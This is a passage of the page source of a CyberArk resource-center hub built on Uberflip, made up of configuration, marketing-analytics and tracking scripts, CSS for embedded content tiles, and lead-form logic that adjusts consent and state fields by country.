                                            'home'            : 'Home',
                        'videos'          : 'Videos',
                        'blogs'           : 'Blogs',
                        'docs'            : 'Docs',
                        'social'          : 'Social',
                        'recent'          : 'Recent Searches',
                        'noItems'         : 'No Items Found',
                        'noItemsStream'   : 'No Items Found in this Stream',
                        'seeMore'         : 'Load More',
                        'searchEntireHub' : 'Search the rest of the Hub',
                        'searchAllContent': 'All Content',
                        'searchPlaceholder':'Search'
                                    },
                'maxRecents'          : 5            },

            'isMobile'         : false,
            'isEmbedded'       : false,
            'isEmbeddedTile'   : false,

            'labOptions'       : {"topMenu":true,"permHeader":true,"noHeader":false,"hideBanner":false,"highlightFirst":true,"stickyFooter":false,"flipbookBreakOut":false,"linkBreakOut":false,"loadByButton":true,"navAlwaysTop":true},
            'embedOptions'     : {"hideHeader":false,"hideBanner":false,"hideFooter":false,"hidePrimaryNav":false,"hideSecondaryNav":false,"linkBreakOut":false,"revealBehaviour":"fade"},
            'knownUser'        : {"Mailchimp":0,"Hubspot":0,"Eloqua":0,"Marketo":0,"Pardot":0,"Acton":0},
            'eloquaFirstPartyCookies'  : 0,
            'mapIntegrations'  : ["Marketo"],
            'integrationsToTrackViews' : ["Marketo"],
            'disableUfMetrics' : false,
            'pageType'         : Hubs.PAGE_TYPE_ITEM,
            'bombora'          : true,
            'analyticsCodes'   : [],
            'enableDebugger'   : false,
            'itemPreviewButtonLabel':   'Continue Reading...',
            'externalApiUrl': 'https://v2.api.uberflip.com',
            'isPreventAnalyticsCollectionEnabled': false,
            'privacyGroups': [],
        });
    </script>
<script data-functionality-name="BOMBORA">

    /* Get uuid - used to pass back to bombora as our main identifier of this visitor */
    window.getBomboraUuid = function() {
        return '';
    };

    /* Get page id - used to pass back to bombora as the item being viewed */
    window.getBomboraUrlId = function(){
        var env = 'production';
        var $infoDiv = $('#page-type-identifier');
        var item = {
          type : $infoDiv.attr('data-page-type'),
          collectionId : $infoDiv.attr('data-collection-id'),
          id : $infoDiv.attr('data-item-id')
        };

        if(item.type === 'PAGE_TYPE_HUB'){
            return env + '||' + Hubs.Config.hubId;
        } else if(item.type === 'PAGE_TYPE_COLLECTION'){
            return env + '||' + Hubs.Config.hubId + '||' + item.collectionId;
        } else if(item.type === 'PAGE_TYPE_ITEM'){
            return env + '||' + Hubs.Config.hubId + '||' + item.collectionId + '||' + item.id;
        }
    };

    // Bombora tracking script
    (function (w,d,t) {
        _ml = w._ml || {};
        _ml.eid = '52079'; // Uberflip ID -- DO NOT CHANGE
        _ml.fp =  w.getBomboraUuid();
        _ml.cid = w.getBomboraUrlId();
        _ml.informer = {
            callback: function () {
                //call back when profile is loaded
                //data is loaded in _ml.us
            },
            enable: true
        };
        var s, cd, tag; s = d.getElementsByTagName(t)[0]; cd = new Date();
        tag = d.createElement(t); tag.async = 1;
        tag.src = 'https://ml314.com/tag.aspx?' + cd.getDate() + cd.getMonth();
        s.parentNode.insertBefore(tag, s);
    })(window,document,'script');
</script><script data-functionality-name="MARKETO">
    window.loadMarketoTracking = function(){
        Munchkin = undefined;
        (function(d,s,i,r) {
            var el = d.getElementById(i);
            if (el){return;}
            var n=d.createElement(s),e=d.getElementsByTagName(s)[0];
            n.id=i;n.src='//munchkin.marketo.net/munchkin.js';
            n.onreadystatechange = function() {
                if (this.readyState == 'complete' || this.readyState == 'loaded') {
                    Munchkin.init("316-CZP-275", {"cookieLifeDays":365});
                }
              };
            n.onload = function() {
                Munchkin.init("316-CZP-275",{"cookieLifeDays":365});
            };
            e.parentNode.insertBefore(n, e);
            
        })(document,"script","munchkin",300000);
    }
    loadMarketoTracking();
</script>

<script>
    window.obData = {};
    //window.obData.streamBannerImage = 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV81ZWEwOGM2ZTQ0MWYxLnBuZyZ2ZXJzaW9uPTAwMDAmc2lnPTE5OTViMDVjOWMzYzUyMThlNDBjNDY4MTlhOWY0N2I1';
    window.obData.streamBannerImage = 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV82MDJjMmI5YmM1NzNiLnBuZyZ2ZXJzaW9uPTAwMDAmc2lnPWFmNWEwOGYxMDUzMzQwYjg0NjMzYmZmN2ViYmQxY2Fj';

    window.obData.homeBannerText = 'Resource Center';
    
    window.obData.frontEndTags = {
        'solution brief': 'solution brief',
        'ebook': 'ebook',
        'video': 'video',
        'Webinar': 'webinar',
        'white paper': 'whitepaper',
        'analyst report': 'analyst report',
        'case study': 'case study',
        'infographic': 'infographic',
        'product datasheet': 'product datasheet',
        'blog': 'blog',
        'analyst webinar': 'analyst webinar',
        'threat research blog': 'threat research blog',
     
    };
    
    window.obData.frontEndLabels = {
        'solution brief': 'Download Solution Brief',
        'ebook': 'Download eBook',
        'video': 'Watch Video',
        'Webinar': 'Watch Webinar',
        'white paper': 'Download Whitepaper',
        'analyst report': 'Download Analyst Report',
        'case study': 'Download Case Study',
        'infographic': 'Download Infographic',
        'product datasheet': 'Download Product Datasheet',
        'blog': 'Read Blog',
        //'analyst webinar': 'analyst webinar',
     
    };
    
    window.obData.ctaCustomizations = {
        green: [312282, 315201, 315189, 314340, 314334, 315501, 319542, 324935],
        blue: [297372, 314328, 315201, 315153, 314328, 315177, 336710, 351121, 377695],
        orange: [285867, 315219, 314343, 351118, 351733]
    };
    
    window.obData.fullWidthCtas = {
        // '285765': {
        //     heading: 'Winning security starts with privledged access management',
        //     text: 'Lorem ipsum dolor sit amet consectetur, adipisicing elit. Doloribus, dolore? Earum eius pariatur ducimus! Doloremque odio tempore corrupti enim dolores.',
        //     imageUrl: 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV81ZTIwNzk1MjRhM2RlLmpwZyZ2ZXJzaW9uPTAwMDAmc2lnPTMzOTkxM2IwMGNlMjcxMmIyYWQzNzhjNTlhYTMyNDk2'
        // },
        // '285867': {
        //     heading: 'Full bleed CTA number two test',
        //     text: 'Lorem ipsum dolor sit amet consectetur, adipisicing elit. Doloribus, dolore? Earum eius pariatur ducimus! Doloremque odio tempore corrupti enim dolores.',
        //     imageUrl: 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV81ZTIwZDVjN2VjODBjLmpwZyZ2ZXJzaW9uPTAwMDAmc2lnPTVhZGY1MjU3ZjUyYzNmZDUwZWRiNjkyZGMwZTBkOTdh'
        // },
        
        
    };
    
    window.obData.ctaImages = {
     331232: {
        mobileImage: 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV81ZjJhYWRlNDJhM2VjLmpwZyZ2ZXJzaW9uPTAwMDAmc2lnPTFjMDdlMTI1NGYzNDc5N2JjZDI0ODRlNDZlZDlhMTM3',
        desktopImage: 'https://content.cdntwrk.com/files/aHViPTEwODU0MCZjbWQ9aXRlbWVkaXRvcmltYWdlJmZpbGVuYW1lPWl0ZW1lZGl0b3JpbWFnZV81ZjI5YWI2YWExYWY1LmpwZyZ2ZXJzaW9uPTAwMDAmc2lnPWEzOGMxYjQyMTAyMThjNGI1ZmM0NTE3NWU2OWRkMzFm',
     },
    };
    
    // Use the following format to add new stream streamDescriptions
    // To add links within the stream description use this format: [LINK_TEXT](LINK_HREF)
    /*
        STREAM_ID: `STREAM_DESCRIPTION`,
    */
    
    window.obData.streamDescriptions = {
        // : `Lorem ipsum dolor sit amet, [Test Link](www.google.com) Integer nec odio. Praesent libero. Sed cursus ante dapibus diam. Sed nisi. [Test Link 2](www.google.com) Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum.`,
      7265573: {
          title: 'This is the new stream title with no character limit',
          description: "**Lorem ipsum dolor sit amet**, [Test Link](www.google.com) *Integer nec odio.* ~~Praesent libero.~~ Sed cursus ante dapibus diam. Sed nisi. [Test Link 2](www.google.com)  \n Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum.\n - test bullet point \n - test bullet point 2",
      },
    };

    window.obData.streamDescriptions = {
        // : `Lorem ipsum dolor sit amet, [Test Link](www.google.com) Integer nec odio. Praesent libero. Sed cursus ante dapibus diam. Sed nisi. [Test Link 2](www.google.com) Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum.`,
      6824736: {
          title: 'On-Demand Webinars',
          description: "Interested in attending a live webinar? [click here](https://www.cyberark.com/webinars/) to see the schedule and sign-up.",
      },
    };
    
</script>
<script>
var getMatchingTileTag = function(elementTags, tagList) {
  
    for (var tag in tagList) {
      var normalizedTags = elementTags.toLowerCase().split(',');
      var regEx = new RegExp(tag, 'gi');
    
      if (regEx.test(normalizedTags)) {
          return tag;
      }
    }

};
(function($, Hubs, undefined) {
/*  Add your JavaScript below */
var embedFixes = function() {
     var frontEndTags = window.obData.frontEndTags;
    
    if(document.getElementById("embed-tile") === null && document.querySelector(".embedTileImg")) {
        var embedTileImg = document.querySelector(".embedTileImg");
        embedTileImg.parentNode.id = "embed-tile";
    }
    var embedTile = document.getElementById("embed-tile");
    if(embedTile !== null){
        document.querySelector("body").classList.add("embed-tile-present");
    }
    
     if(document.querySelector('.embed-tile-present')){
        var tags = document.querySelector('#embed-tile').dataset.tags;
        var label = getMatchingTileTag(tags, frontEndTags);
        document.querySelector('.h3like').insertAdjacentHTML('beforebegin', '<p class="ob-custom-label">' + label + '</p>');
        }
};
embedFixes();
}(window.jQuery, window.Hubs));
</script>
<style>
@font-face {
  font-family: RopaSansPTT-Light;
  src: url(https://cihost.uberflip.com/cyberArk/OB-3963/build/fonts/372722_2_unhinted_0.woff2)
    format('woff2');
}
@font-face {
  font-family: RopaSansPTT-Regular;
  src: url(https://cihost.uberflip.com/cyberArk/OB-3963/build/fonts/372722_4_unhinted_0.woff2)
    format('woff2');
}
@font-face {
  font-family: RopaSansPTT-Bold;
  src: url(https://cihost.uberflip.com/cyberArk/OB-3963/build/fonts/372722_1_unhinted_0.woff2)
    format('woff2');
}

.embed-tile-present {
    display: block !important;
}


.embed-tile-present #injected-header, .embed-tile-present #injected-footer, .embed-tile-present .mobile-search-header, .embed-tile-present .breadcrumb-container, .embed-tile-present .overlay-scroller {
    display: none !important;
}

body.embed-tile-present li.embed-tile-present .tile.single{
    display: block !important;
    position: fixed !important;
    top: 0;
    left: 0;
    }

    .embed-tile-present.single-page #injected-header,
    .embed-tile-present.single-page #injected-footer, 
    .embed-tile-present.single-page .mobile-search-header{
        display: none !important;
    }
    
    .embed-tile-present.single-page #page-type-identifier,
    .embed-tile-present.single-page #collection-items {
        display: block !important;
        opacity: 1;
    }
    .embed-tile-present.single-page .top-nav {
        display: none !important;
        }

  .embed-tile-present.single-page .tile {
    height: 330px !important;
    width: 250px !important;
  }

.embed-tile-present .embed-tile-present .tile.single a.item-link.view {
    display: block !important;
}

.embed-tile-present .ob-custom-label {
    font-family: 'RopaSansPTT-Bold', 'Open-Sans', sans-serif;
    color: #939598;
    text-transform: uppercase;
    font-size: 16px;    
    margin: 0;
    padding: 10px 0 0 20px;
}

.embed-tile-present .tile.single {
  border: 1px solid #bdbec0;
  box-sizing: border-box;
  box-shadow: none;
}
.embed-tile-present .tile.single * {
  box-sizing: border-box;
}
.embed-tile-present .tile.single .icon.star {
  display: none;
}
.embed-tile-present .tile.single .truncated {
  display: block;
}
.embed-tile-present .tile.single .full-length {
  display: none;
}
.embed-tile-present .tile.single .description {
  transition: height 0.2s ease;
  height: 58.90052356% !important;
  background-color: #f1f2f2 !important;
  border-top: 1px solid #bdbec0;
}
.embed-tile-present .tile.single .description .friendly-timestamp,
.embed-tile-present .tile.single .description h4,
.embed-tile-present .tile.single .description .long-h3,
.embed-tile-present .tile.single .description .share-single {
  display: none !important;
}
.embed-tile-present .tile.single .description .ob-custom-label-container {
  padding-left: 20px;
  padding-top: 20px;
}
.embed-tile-present .tile.single .description .ob-custom-label-container .ob-custom-label {
  font-family: "RopaSansPTT-Bold", 'Open-Sans', sans-serif;
  color: #939598;
  text-transform: uppercase;
  font-size: 16px;
}
.embed-tile-present .tile.single .description .h3like {
  color: #414042 !important;
  font-family: "RopaSansPTT-Regular", 'Open-Sans', sans-serif;
  font-size: 20px !important;
  line-height: 1.2 !important;
  text-transform: none;
  white-space: normal !important;
  text-overflow: clip !important;
  padding-top: 15px;
  margin-top: 0;
}
.embed-tile-present .tile.single .description .ob-custom-label-container + .h3like {
  padding-top: 0;
}
.embed-tile-present .tile.single .description h4,
.embed-tile-present .tile.single .description .long-h3 {
  font-family: "Open Sans", sans-serif;
  color: #414042 !important;
  font-size: 16px !important;
  line-height: 1.4 !important;
  font-weight: 300;
}
.embed-tile-present .tile.single a.item-link.view {
  color: #4d8fcc;
  background-image: none;
  padding-left: 20px;
  text-transform: uppercase;
  font-size: 16px !important;
  font-family: "RopaSansPTT-Regular", 'Open-Sans', sans-serif;
  text-decoration: none !important;
  border-top: 1px solid #bdbec0;
}
.embed-tile-present .tile.single a.item-link.view::before {
  content: none;
}
.embed-tile-present .tile.single a.item-link.view::after {
  content: ">";
  position: relative;
  display: inline-block;
  background: none;
  left: 2px;
  top: -10px;
  right: auto;
}

.embedTileImg img {
    display: block;
    height: 135px;
    width: 100%;
    object-fit: cover;
}

</style>

<script>
// Ubermenu config
// window.ubermenu_data = {
//     remove_conflicts: "on",
//     reposition_on_load: "off",
//     intent_delay: "300",
//     intent_interval: "100",
//     intent_threshold: "7",
//     scrollto_offset: "50",
//     scrollto_duration: "1000",
//     responsive_breakpoint: "1300",
//     accessible: "on",
//     retractor_display_strategy: "responsive",
//     touch_off_close: "on",
//     submenu_indicator_close_mobile: "on",
//     collapse_after_scroll: "on",
//     v: "3.4.1.1",
//     configurations: ["main"],
//     ajax_url: "https://www.cyberark.com/wp-admin/admin-ajax.php",
//     plugin_url: "https://www.cyberark.com/wp-content/plugins/ubermenu/",
//     disable_mobile: "off",
//     prefix_boost: "",
//     aria_role_navigation: "off",
//     aria_expanded: "off",
//     aria_hidden: "off",
//     aria_controls: "",
//     aria_responsive_toggle: "off",
//     icon_tag: "i",
//     theme_locations: {primary: "Primary Menu"},
// };


</script>
<script>
// $('pre').addClass('prettyprint');

</script>


<script id="onbrand__scripts-production" src="//cihost.uberflip.com/cyberArk/master/build/en/en.bundle.js"></script>

<script>    
// Asset Information

var ufPageTitle =  $("meta[name='title']").attr("content");
    
// Define asset type based on Item tag
    var prefix = $('#page-type-identifier').attr("data-tags");
    if ($('body').hasClass('single-page') && prefix !== null && prefix !== undefined){
    
    // Convert tag list into array
    var tagArray = prefix.split(',');

    if (tagArray.includes('White paper')) {
        var ufAssetType = 'White Paper';
    } else if (tagArray.includes('Infographic')) {
        var ufAssetType = 'Infographic';
    } else if (tagArray.includes('EBook')) {
        var ufAssetType = 'EBook';
    } else if (tagArray.includes('Product Datasheet')) {
        var ufAssetType = 'Product Datasheet';
    } else if (tagArray.includes('Solution Brief')) {
        var ufAssetType = 'Solution Brief';
    } else if (tagArray.includes('Video')) {
        var ufAssetType = 'Video';
    } else if (tagArray.includes('Case Study')) {
        var ufAssetType = 'Case Study';
    } else if (tagArray.includes('Webinar')) {
        var ufAssetType = 'Webinar';
    } else if (tagArray.includes('Analyst Report')) {
        var ufAssetType = 'Analyst Report';
    }
}
    
// Hub Events

Hubs.Events.on('load', function(){
    secondarySubmission();
});

Hubs.Events.on('ctaFormSubmitSuccess', function(ctaId, ctaData, ctaName){
    firstSubmission(ctaId);
});

// First Submission Data Layer Push - a Form CTA is physically filled out and submitted
function firstSubmission(ctaId, ctaData, ctaName){
    window.dataLayer = window.dataLayer || [];
    
    if (ctaId == 312282 || ctaId == 319542){ // Asset download
        window.dataLayer.push({        
           'event' : 'asset_download',  // trigger
           'asset_type': ufAssetType, 
           'download_type': 'Gated Download', 
           'asset_title': ufPageTitle
        });
    } else if (ctaId == 314328){ // Demo Request
        window.dataLayer.push({        
           'event' : 'demo',
           'form_submit': 'Demo'
        });
    } else if (ctaId == 314334){ // Contact Us
        window.dataLayer.push({        
           'event' : 'contact_us',  
           'form_submit': 'Contact Us'
        });
    } else if (ctaId == 314340){ // DNA CTA
        window.dataLayer.push({        
           'event' : 'dna',  
           'form_submit': 'DNA'
        });
    } else if (ctaId == 314343){ // EPM CTA
        window.dataLayer.push({        
           'event' : 'epm_free_trial',  
           'form_submit': 'EPM Free Trial'
        });
    } else if (ctaId == 315201){ // Blueprint CTA
        window.dataLayer.push({        
           'event' : 'blueprint',  
           'form_submit': 'CyberArk Blueprint'
        });
    } else if (ctaId == 315177){ // CyberArk Guided Tour CTA
        window.dataLayer.push({        
           'event' : 'guided_tour',  
           'form_submit': 'CyberArk Guided Tour'
        });
    } else if (ctaId == 315153){ // Alero Free Trial
        window.dataLayer.push({        
           'event' : 'alero_free_trial',  
           'form_submit': 'Alero Free Trial'
        });
    } else if (ctaId == 315189){ // Alero Guided Tour
        window.dataLayer.push({        
           'event' : 'alero_guided_tour',  
           'form_submit': 'Alero Guided Tour'
        });
    } else if (ctaId == 315219){ // Privilege Cloud Demo
        window.dataLayer.push({        
           'event' : 'privilege_cloud_demo',  
           'form_submit': 'Privilege Cloud Demo'
        });
    }
}

// Known User - Gated Asset and Non-Gated Assets
function secondarySubmission() {
        
    window.dataLayer = window.dataLayer || [];
    
    // Secondary submission, no gate visible since user is fully profiled
    if (window.localStorage.getItem('flyptech-hub-108540') !== null && !$('div').hasClass('blocking-cta') && $('div.block-cta').children().length > 0) {
        window.dataLayer.push({    
           'event' : 'asset_download',  // trigger
           'asset_type': ufAssetType, // Category
           'download_type': 'Gated Download', // Action
           'asset_title': ufPageTitle // Label
        });
        // console.log('Gated asset viewed, no CTA');
        // console.log(window.dataLayer);
    }
        
    // Ungated asset is viewed, excluding blog post Item types
    if ($('body').hasClass('single-page') && !$('div').hasClass('blocking-cta') && Hubs.appInstance.itemType !== 'blogpost' && $('div.block-cta').children().length === 0) {
        window.dataLayer.push({
           'event' : 'asset_download',  // trigger
           'asset_type': ufAssetType, // Category
           'download_type': 'Ungated Download', // Action
           'asset_title': ufPageTitle // Label
        });
        // console.log('Ungated asset was viewed');
        // console.log(window.dataLayer);
    }   
}

</script>

<script>

function persistParams() {

    urlArray = document.referrer.split('?'); // Split out the referrer's params...
    if (urlArray[1]) {
    var oldParams = new URLSearchParams( urlArray[1] ); 
    var myURL = new URL(window.location.href); // The existing URL
    
    // console.log('referrer:' + document.referrer);
    // console.log(urlArray);
    
    if (oldParams.has("utm_medium")) {
    myURL.searchParams.set('utm_medium', oldParams.get("utm_medium")); // more direct solution
    }
    if (oldParams.has("utm_source")) {
    myURL.searchParams.set('utm_source', oldParams.get("utm_source"));
    }
    if (oldParams.has("utm_campaign")) {
    myURL.searchParams.set('utm_campaign', oldParams.get("utm_campaign"));
    }
    if (oldParams.has("utm_content")) {
    myURL.searchParams.set('utm_content', oldParams.get("utm_content"));
    }
    if (oldParams.has("utm_term")) {
    myURL.searchParams.set('utm_term', oldParams.get("utm_term"));
    }
    window.history.replaceState( {} , 'Refresh UTM params', myURL.toString() ); 
    }
}

persistParams();

function getQueryString() {
    var query_string = {};
    var query = window.location.search.substring(1);
    var vars = query.split("&");
        for (var i=0;i<vars.length;i++) {
            var pair = vars[i].split("=");
            if (typeof query_string[pair[0]] === "undefined") {
                query_string[pair[0]] = pair[1];
            } else if (typeof query_string[pair[0]] === "string") {
                var arr = [ query_string[pair[0]], pair[1] ];
                query_string[pair[0]] = arr;
            } else {
                query_string[pair[0]].push(pair[1]);
            }
        } 
    return query_string;
}

var queryString = getQueryString();

function submitQueryStrings(){
    if (queryString.utm_campaign !== undefined){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="utmcampaign"]').val(queryString.utm_campaign);
    }
    if (queryString.utm_medium !== undefined){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="utmmedium"]').val(queryString.utm_medium);
    }
    if (queryString.utm_source !== undefined){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="utmsource"]').val(queryString.utm_source);
    }
    if (queryString.utm_content !== undefined){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="utmcontent"]').val(queryString.utm_content);
    }
    if (queryString.utm_term !== undefined){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="utmterm"]').val(queryString.utm_term);
    }
}

Hubs.Events.on('ctaActivate', function(ctaId) {
    submitQueryStrings();
    
});

</script>

<script>

function stateControl(ctaId){
    var countryArray = ['Canada','United States','Australia'];
    var usArray = ['AK','AL','AR','AS','AZ','CA','CO','CT','DC','DE','FL','GA','GU','HI','IA','ID','IL','IN','KS','KY','LA','MA','MD','ME','MI','MN','MO','MP','MS','MT','NC','ND','NE','NH','NJ','NM','NV','NY','OH','OK','OR','PA','PR','RI','SC','SD','TN','TX','UM','UT','VA','VI','VT','WA','WI','WV','WY'];
    var canArray = ['AB','BC','MB','NB','NL','NT','NS','NU','ON','PE','QC','SK','YT'];
    var ausArray = ['Ashmore and Cartier Islands','Australian Antarctic Territory','Australian Capital Territory','Christmas Island','Cocos (Keeling) Islands','Coral Sea Islands','Heard Island and McDonald Islands','Jervis Bay Territory','New South Wales','Norfolk Island','Northern Territory','Queensland','South Australia','Tasmania','Victoria','Western Australia'];
    
    var checkbox = '<div class="cta-field-section one-line optin-container">' +
                    '<input name="consent" type="checkbox" class="preview-form-field optin-check">' +
                    '<span class="cta-field-name custom-cta">Contact me using the information I provided above about other CyberArk products and services.</span>' +
                    '</div>';
                    
    var privacyMsg = '<div class="cta-field-section">' +
                    '<span class="cta-field-name custom-cta privacy-msg">For questions related to Cyberark’s handling of your personal information, please refer to our <a href="https://www.cyberark.com/privacy-policy/" target="_blank"> privacy policy.</a> You may unsubscribe at any time.</span>' +
                    '</div>';
                    
    var highValueMsg = '<div class="cta-field-section">' +
                    '<span class="cta-field-name custom-cta high-value-msg">Upon submitting this form, we will contact you using the information provided to assist you with your request.</span>' +
                    '</div>';
                    
    $('.cta.setValues div.hidden-cta-fields .cta-field-section').last().after(checkbox);
    $('.cta.setValues div.hidden-cta-fields .cta-field-section').last().after(privacyMsg);
    console.log('checkbox added');
    
    if (ctaId == 314334 || ctaId == 314328 || ctaId == 314340 || ctaId == 314343 || ctaId == 315153 || ctaId == 315177 || ctaId == 315189 || ctaId == 315201 || ctaId == 315219){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section').last().after(highValueMsg);
    }
    
    var consentValue = $.cookie("ufconsent");
    
    if (consentValue === "true"){
        $('.optin-check').prop('checked', true);
    }
    
    var checkDropDown = function(){
        var countrySelected = $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="country"] :selected').text();
        var attr = $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="country"]').attr('data-value');
        
        // US behavior
        if(countrySelected.includes('United States')){
            console.log('US Selected');
    
            if (typeof attr !== typeof undefined && attr !== false && $('body').hasClass('single-page')){
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().hide();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            } else {
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().show();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().show();
            }
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="Opt_in__c"]').parent().detach();
            $('.optin-check').parent().hide();
            
            $(".cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping='state'] > option").each(function() {
                $( this ).hide();
                if(jQuery.inArray(this.value, usArray) !== -1){
                    $( this ).show();
                }
            });
        
        // Canada behavior
        }else if(countrySelected.includes('Canada')){
            console.log('Canada Selected');
            
            if (typeof attr !== typeof undefined && attr !== false && $('body').hasClass('single-page')){
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().hide();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            } else {
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().show();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            }
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="Opt_in__c"]').parent().show();
            $('.optin-check').parent().show();
            
            $(".cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping='state'] > option").each(function() {
                
                $( this ).hide();
                if(jQuery.inArray(this.value, canArray) !== -1){
                    $( this ).show();
                }
            });
        
        // Australia behavior
        } else if (countrySelected.includes('Australia')){
            console.log('Australia Selected');
            if (typeof attr !== typeof undefined && attr !== false && $('body').hasClass('single-page')){
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().hide();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            } else {
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().show();
                $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            }
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="Opt_in__c"]').parent().show();
            $('.cta.setValues div.hidden-cta-fields .optin-check').parent().show();
            
            $(".cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping='state'] > option").each(function() {
                
                $( this ).hide();
                if(jQuery.inArray(this.value, ausArray) !== -1){
                    $( this ).show();
                }
            });
            
        // Other behavior
        } else {
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="state"]').parent().hide();
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="postalCode"]').parent().hide();
            $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="Opt_in__c"]').parent().show();
            $('.cta.setValues div.hidden-cta-fields .optin-check').parent().show();
        }
    };
    
    var checkConsent = function(){
    var countrySelected = $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="country"] :selected').text();
    if(!countrySelected.includes('United States')){
            var consentGiven = $('.optin-check').is(':checked');
            if (consentGiven === true) {
                $('[data-mapping=Opt_in__c]').val('Yes');
                $('[data-mapping=Opt_in__c]').attr('data-value', 'Yes');
                $.cookie("ufconsent", "true", { expires: 365 });
            } else {
                $('[data-mapping=Opt_in__c]').val('No');
                $('[data-mapping=Opt_in__c]').attr('data-value', 'No');
                $.cookie("ufconsent", "false", { expires: 365 });
            }
        }
    if(countrySelected.includes('United States')){
        $('[data-mapping="Opt_in__c"]').val('');
        $('[data-mapping="Opt_in__c"]').attr('data-value', '');
    }
    };
    
    //On Change functions
    $(document).on('change','.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="country"]',function(){ 
        checkDropDown();
    });
    $('.optin-check').change(function(){ checkConsent(); });
    //Init listener functions
    checkDropDown();
    checkConsent();
}

// Change dummy field label on pre-activate state
function previewField() {
    var halfProfile = $('div.hidden-cta-fields .cta-field-section [data-mapping="country"]').attr('data-value');
    var fullProfile = $('div.hidden-cta-fields .cta-field-section [data-mapping="phone"]').attr('data-value');
    
    if (typeof halfProfile !== typeof undefined && halfProfile !== false && $('body').hasClass('single-page') && typeof fullProfile == typeof undefined){
        $('.cta-activate-button-container .cta-field-section span.cta-field-name').text('Phone Number');
    } else if (typeof fullProfile !== typeof undefined && fullProfile !== false && $('body').hasClass('single-page')){
        $('.cta-activate-button-container .cta-field-section span.cta-field-name').text('Email');
    }
}

// Ensure email, privacy and checkbox show at a minimum for fully profiled users, seeing a never hide gated CTA
function thirdPartyCTA(ctaId){
    var fullProfile = $('div.hidden-cta-fields .cta-field-section [data-mapping="phone"]').attr('data-value');
    
    if (ctaId == 319542 && typeof fullProfile !== typeof undefined && fullProfile !== false && $('body').hasClass('single-page')){
        $('.cta.setValues div.hidden-cta-fields .cta-field-section [data-mapping="email"]').parent().show();   
    }
}

// Open up 3rd party CTA links when Form CTA is submitted
function thirdPartyCtaLink(){
    var ctaData = $('body').find('.cta').data();
    console.log(ctaData.ctaId);
    
    if (ctaData.ctaId == 319542){

    var link = $('.cta-button-container a.cta-button').attr('href');
        
        $('div.form-fields .cta-button-container .cta-submit-form').on( "click", function(e) {
            window.open(link, '_blank');
            $('.blocking-cta').css('opacity', '0.2');
            $('.blocking-cta').css('filter', 'blur(4px)');
            $('.blocking-cta').css('-webkit-filter', 'blur(4px)');
            $('.fullscreen-controls').hide();
            
            setTimeout(function(){ 
                $('.single-embed-wrapper .block-cta').show();
            }, 3000);
        });
    }
}

// Hub Events
Hubs.Events.on('ctaActivate', function(ctaId) {
    stateControl(ctaId);
    thirdPartyCTA(ctaId);
    thirdPartyCtaLink();
});

Hubs.Events.on('load', function() {
    previewField();
});

</script>

<script>

window.ubermenu_data = {
    remove_conflicts: "on",
    reposition_on_load: "off",
    intent_delay: "300",
    intent_interval: "100",
    intent_threshold: "7",
    scrollto_offset: "50",
    scrollto_duration: "1000",
    responsive_breakpoint: "1300",
    accessible: "on",
    retractor_display_strategy: "responsive",
    touch_off_close: "on",
    submenu_indicator_close_mobile: "on",
    collapse_after_scroll: "on",
    v: "3.4.1.1",
    configurations: ["main"],
    ajax_url: "https://www.cyberark.com/wp-admin/admin-ajax.php",
    plugin_url: "https://www.cyberark.com/wp-content/plugins/ubermenu/",
    disable_mobile: "off",
    prefix_boost: "",
    aria_role_navigation: "off",
